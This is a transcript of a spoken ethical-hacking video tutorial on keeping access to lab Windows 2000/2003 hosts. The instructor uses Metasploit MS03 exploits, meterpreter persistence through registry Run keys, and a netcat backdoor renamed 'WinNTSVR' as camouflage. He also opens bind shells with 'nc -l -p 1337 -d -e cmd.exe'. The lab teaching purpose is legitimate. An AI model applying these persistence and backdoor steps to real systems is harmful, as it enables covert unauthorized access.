Hello guys. Uh, as I already promised, I'm going to give you the last part of ethical hacking practical, which is actually about the uh, process of maintaining access. Okay, so here's my note. So this is, we are here. Yeah, maintaining access, which is normally the last part of our ethical hacking step. Well, the web application hacking is gonna be different than this one. So step number 1 up to 9, these are applicable to host and system hacking, while web application is, split into, or I would say, is is gonna be discussed in different video. Okay, so don't worry about that. So here's the step: maintaining access. So we got Windows Server 2000, then Web 1, and Windows Server 2003. These two are our Windows servers used for the demonstration. Yeah, and tools will be using Metasploit framework, Netcat, and also the Freebie Script. Right. So let's go to our Kali. So let's check the IP. And let's say we have the plan to attack then Web 2, which is 131.107.1.254. Okay, so let's launch MSF console. Okay, so we're going to use the very common exploit. I mean, we will try to exploit the very common vulnerability called the MS03. Search for MS03, and we got this. Let's exploit this vulnerability to get full access to the system, to the target. Set payload. So we're using our favorite meterpreter reverse TCP. So we set the target 254, set L host. And exploit. Now we got the meterpreter, right? So to maintain, the last part of our technique, once we have already done a lot of different things, the post-exploitation, the last part, and we're going to maintain access. How do we maintain our access to this machine? Yeah. So the answer is you can actually use a script, ready-made, a custom script from Metasploit that runs on meterpreter. Let's run this one. Run. There's a script called persistent, and just type persists and then -h or -h. I'll give you the option. Yeah. So for example, if you want this persistent script to run automatically, yeah, start a matching exploit multi-handler. So you just put A. So let's try this one. By the way, it says that meterpreter scripts are deprecated, so you can use this post-manage persistent executable file. Yeah. Maybe next time I will discuss on how to actually use this persistent post-meterpreter script. Yeah. So for now, I'll just stick to this one. So we're going to use run persistent -a. Then you can specify the others, like I want to start automatically start the agent on boot as a service with the system privileges minus dash s. And you can specify whether you want to run as agent when the user log on, u, then dash x. So the u here is for user logon, and then x is when the system boots. And you can also specify the port. You can specify the interval in seconds, but for this one we don't really need to do this. So just set the port on which the system running metasploit is listening. So we're going to put P443, which is the same as this is actually our pivot port to listen to, or the listener. And we can specify the IP address of our listening IP, which is 131.107.1.252, right? So run this one. All right, so notice that we got a resource file to do a cleanup in case we need to do a cleanup or housekeeping. And notice that we have the payload meterpreter set, and it was actually written on C temp. The file name is random, and in fact this meterpreter persistent was actually set to auto run in this particular location, and this one, because we set the u, it will give us and also the X will start when the system boots. So both current control, so current version run and the software Microsoft Windows run. And then if you go to the target, that's just to give you an idea about. Let me log on as admin, and let me show you where to actually check. Number one is you go to the C Windows and System32. Just put next System32. And we got the C Windows temp, right? It's supposed to be temp. And notice that we got this Freebie Script, busy something. So this is our Freebie Script. Okay, so this one, and let's check the the Freebie Script is actually BZ something, VBS, which is the same as what we have here. BZ something. Okay, and on the registry, let's run regedit. We can see that our regedit also shows something. It actually create this one. This is the new key, same as what we have in our so this is the new key on registry. Oops, sorry. And it is actually pointing to Windows temp and then the name of our Freebie Script. So the Freebie Script is actually the payload that will run every time you restart Windows or even log on as the user. Okay. And even if, let's say, you try to start this, let me exit from here, and then I'll create a listener. So use exploit multi-handler, set payload Okay, and set output. Okay, then exploit. Yeah, this will create a listener. 443 is already used, so I think we need to perhaps reboot the system. Yeah. Let's reboot the system. Let me see. Let's just run this one. So use the same one. Okay, same one. Set the R host to our machine. Set out port 403. Exploit. Okay, then when you restart your machine, so set. If our meterpreter, persistent meterpreter runs correctly, you'll get connections as soon as the Windows started and the administrator log on. Let's try. I'll just wait for a while and try to log on as administrator, and bingo, we get a connection, right? So yeah, so we got a connection because we have left the meterpreter, a persistent meterpreter that runs as VB script, and the auto run will be executed every time Windows starts and somebody actually log on, the admins log on to the Windows machine, right? All right, so this is the first one, the first technique. Now, the second technique is that you can actually just type exit, and let me show you another one. I put this into tools. So what you can do for the other one is the second method that you can actually do is to create a Freebie script. Let me just run this nano. I name it VB script, yeah, the VB test.vb. Yeah, so this VB script is very simple. It will enable remote desktop, plant a Trojan or backdoor and registry. Yeah, so you can put like you can use that Netcat, and then I normally rename Netcats to something called WinNTSVR as a camouflage. Yeah, so it won't be obvious. Yeah, and then this is the process in enabling remote desktop by turning on the FD9 connections to 0. Then we plant a Trojan by adding, Netcat, yeah, C Windows System 32, WinNTSVR, yeah, something, yeah, and the same one, yeah, run once update, yeah. So to do a reverse connection, you can just run this one. So on the target machine, we run this, and on the attacker machine, we run NC. So just waiting for the connection. So for example, we can specify that, okay, the Netcat to listen to a connection, yeah, for reverse connect, yeah. So we can do something like this. So let's say I'll run my Netcat, yeah, so NC minus V or dash V dash L dash P or dash LP. Then you can specify port, let's say, let's see, yeah, you can specify port, let's say 443 or something like that, yeah. So you just put the 443, yeah, and we need to, yeah, you just need to run that one, yeah. This will do a listening, yeah, and notice that it actually got a connection from our 254 earlier. So to be more precise, let me just shut down this machine, not to disturb. I'll use a different machine, yeah. I'll power off this one, and then I will use this one, yeah. Okay, now we will first modify this. So I'll use the so we need to upload Netcat executable file, or you can also use the same technique that will allow you to connect to a particular host. Yeah. So first we need to get the Netcat. Yeah. So we can download Netcat. Let me see, we can download this Netcat. Yeah. So Netcat Windows. Okay. So we'll download this one. So compress Netcat. So I'll copy this to my Kali. So we'll put it somewhere on download. Yeah. Let me just copy again. Sometimes Kali does not like it. But if I do a drag and drop, yeah, let me just do a drag and drop. Well, I'm not sure what's the problem with this. Doesn't actually want me to copy and paste. Yeah. Yeah. Okay. So let's see. Okay. So let's just. Okay, let me see what I can do here. That's the problem. Sometimes Kali does not want me to drag and drop. Let's try to drag and drop on this desktop. Okay. Yeah, so let me just close this, and then I need to change this to the settings to local area, the net. So this one requires if you need to connect your Kali to the internet. You also just type DH client ETH0. See, you can ping Google. Oh, okay. So let me just reboot to make it faster. It will take a while to just log on. So try to download the Netcat. You need to have Netcat Windows version, and because you need to put the Netcat Windows version on Windows machine. Yeah. So let me download this Netcat. So put it somewhere on my Kali. So I supposed to be able to connect to the internet. So let me just type Netcat Windows, and then go to this one, and then get this one, save it. Yeah, done. Okay, now we have to go to the let's say we just put it as under tools, cp root downloads, where I downloaded Netcat. Okay, so now I will unzip. Okay, we got the NC, and yeah, so just leave it like that. Yeah, so we got ls nc star.exe. We got Netcat 64 version and Netcat 32 version. Okay, we're done with this, and then now we need to modify the script. See, tools, nano test.vbs. So I'll just use the same Netcat, but to be not to be obvious, we can just use this one, WinNTSVR. Yeah, we'll just put that XE. Yeah. So it depends on you whether you want to change this or not. And because this is our target is Windows 2000, so Windows 2000 does not have Windows directory. The correct directory or folder is WinNT. So we need to change this to WinNT. Right. So we can put it somewhere in temp, for example. So temp, yeah. Yeah, so here this this one is actually the Netcat listening on our target machine. So what we need to do, if you need to connect, you just need to run NC, then the IP address of the target, right? So let's save this, and now I'll run the MSF console. Let's do the attack. So I got test.vb script, so .vbs and Netcat on the same directory, which is under tools. So I'll do the attack on the target. So let's say use, so search for MS03, my favorite. Okay, so run this, use this one. Oops, sorry. Okay, set payload Windows meterpreter first TCP, set our hosts. This is our target, which is Windows 2000. Our host is our machine. Oh, I forgot. I need to change this back to the back to host only. And we can just open this one to make sure that we set the IP address to the same or on the same network. 52/24 route at IP route at default. Ping. Okay, then exit, and then after that you set L host to our Linux machine, our Kali, and set L port 443 exploit. So we got a connection, meterpreter session open. All right, I'm in Den Web 1. Yeah, I'm on this computer. So now I need to upload the, to do a persistent, we need to upload the netcat and also the script. So because without the script, it will be quite tough to actually change the registry. So let's check again let me check my test script. Okay, so same, this is to enable, this is to plant a Trojan or backdoor. We run this, and the location should be under temp, right? Okay. Now let's upload. So help. Let's see what are the options. So we got like upload a file directory. So let's do this. Upload. Upload from root tools. We need to upload the nc.exe. Yeah, let's just check. So we got the nc.exe on the same directory. Yeah. So so upload from you need to put C /. Let me just check now. If we have the directory, I can just type shell. So execute. If shell is not working well, use the shell execute minus or -h -i -f cmd.exe, and okay, let's see. We have a temp. cd temp. Is there any? Okay. Now we will upload the file to this one. So just type exit, go back. So I will type upload from root directory tools and c.exe to c /. We need to put // due to the Windows what do you call this behavior, winnt temp. Yeah, and press enter. It says that not enough storage. I'm not sure on this one. Let me just check again. cd temp. Maybe you can delete something. Let's say start the tmp. What should I do? Let me see. This is our unexpected one. So put under the, let's say, temp. This is actually the error from the target. So let me try to fix this by logging on to this actual PC. Oops. And let's see if I can delete something. So under the winnt temp, let me delete everything there. Maybe we'll have more space. Okay, let's try. So let's try again one more time. Get brief. We are actually system. Get system. Just to make sure that we have full access. And let's try nc.exe. Since there's not enough storage, I'm not very sure why is this happening. Maybe you can put somewhere on. Let's try to create a directory. Let's say okay, let's see. So change to C temp. I have no idea on this one. Yeah. Let me fix the problem and we'll get back to you on this one, right? So just hold on. Well, I was able to find the solution, but it'll take a while to actually change the settings. I need to change the setting to something like I need to set the IRP, stack size, and so on. So I decided to change my targets to then Web2. Yeah. So it'll take a while to actually fix this. So I'll just leave it like that. So I'm changing my target to then Web2. Yeah. Just to speed up the process. Yeah. So exit. So I'll do the same exploit, but I'll just change the I need to change the R host to 254, and I also need to change the yeah. So I need to change to back to the Windows temp, and then yeah. So same thing, just change the WinNT on Windows 2000. Microsoft uses WinNT rather than or instead of Windows, but in the later version, all are running or are using Microsoft is using C Windows. Okay, so I think this one should be okay. Yeah. So I will do the exploit. Once we got this meterpreter, sysinfo, just to verify, and then we'll do the upload from root tools mc.xe to C Windows temp. Okay, uploaded. So this is how we upload the Netcat to Windows temp. And let's check, see the let's say Windows pwd. Okay, just type ls. So we got mc uploaded. Now I will copy the VB script. So repeat the same command. Now we just change to test.vbs. Yeah, done. Verify. So we got Netcat uploaded, and this one test.vb script uploaded. Now to launch this, we need to be on Windows shell. So just type shell. So start.vbs. So I run the C script the name test.vbs. There's an error. Maybe you can run the W script, Windows script, and then test.vbs. Yeah, no error. Yeah. Now Let's check the actual Windows, yeah, just to make sure that it runs correctly. Yeah, so let's log on. So provided that you do not have the access, so let's check the running by running edit. Let me see, we got something wrong. It doesn't actually run correctly. Yeah. Or we can just do a let's try the manual way by typing netcat. So listening, so just put v dash l p or l p. Small l means listen, capital L means listen, rp. Yeah, put 443, or maybe, yeah, just put use different port like 4444, and we'll execute the e assembly.exe. Yeah, and then let's run this netcat just to make sure that we can connect. So nc, then you specify 131.107.102.54 443. Oh, sorry, it's supposed to be 444. Let's check again our netcat. So nano tools test.vbs. Yeah. Oh, we need to specify the D. Oh, now we have another one connection using the this is actually using port 444. 4444. Just type netstat -ion and see if 444 is running. Yeah, this is the correct one. Established. Yeah, this is our previous meterpreter. Okay, so this is through the netcat. I believe my script was not running correctly. I need to check why is it not running correctly. So let's just press Ctrl C and to the channel shell. Let's run again C script /vbs. Says that Microsoft script compilation error, or maybe we run the W script. We try again test.vbs, but it looks like it was not running correctly. Just let's run again, right edit. See, we got the script enabled. So I don't think the script is there, so we still have a problem. Yeah. Yeah, sometimes by the way, the script was actually created very long time ago. It's what, like maybe 9 years ago, so it may not run correctly. I apologize for this, but this is just an example of how we can actually create a script that would actually enable the remote desktop and plan our backdoor. Yeah, so you might want to check different type of script to actually enable the persistence. So anyway, you can use this or the previous meterpreter persistent, yeah, or persistent meterpreter, and the script that will also allow you to connect back to the target, yeah, by launching the netcat. So in this example earlier, In the example earlier, I was actually trying to upload a script which I hope can run and modify registry, but it was not running correctly. But when I test the connection by typing the actual command from the server and then connect to the server by launching my Netcat, it was able to actually give me another shell, right? So again, if you want to run this, you can run this by on the server, by typing netcat dash v dash l dash p. You can specify your port, whatever you port, whatever port you like, 1337, for example, dash d dash e. Then you can put cmd.exe. It will actually execute that. So this is a netcat in listening mode running on our target machine here, and from Kali you can just run nc-v small v, and then you can specify the IP address of your target, and you can specify the port like 1337 and enter. It's open, and sometimes you have to wait for a while to let the script runs. It will provide you with the command, because we already put the this is the correct one. So again, we check the who am I? I'm anti-authority system, right? Okay. All right, that's my the tutorial about persistent. So we did try the metasploit framework to exploit the target, and we also run the meterpreter persistent. So we just put it as meterpreter persistent or persistent meterpreter. Then we try to use the netcat, the nc, and a simple VBScript script. All right, so I hope you enjoyed the tutorial. We did have some problem, but anyway, we learned from the mistake. Don't worry about that. Try harder, and then stick to your goal, the objective, so that you can of course we need to do a lot of things. We need to try harder to make it happen, depending on the target, the methods you'll get into your, or you'll get your objective. All right, so see you next time. Hope you enjoy. Thanks for watching. Bye.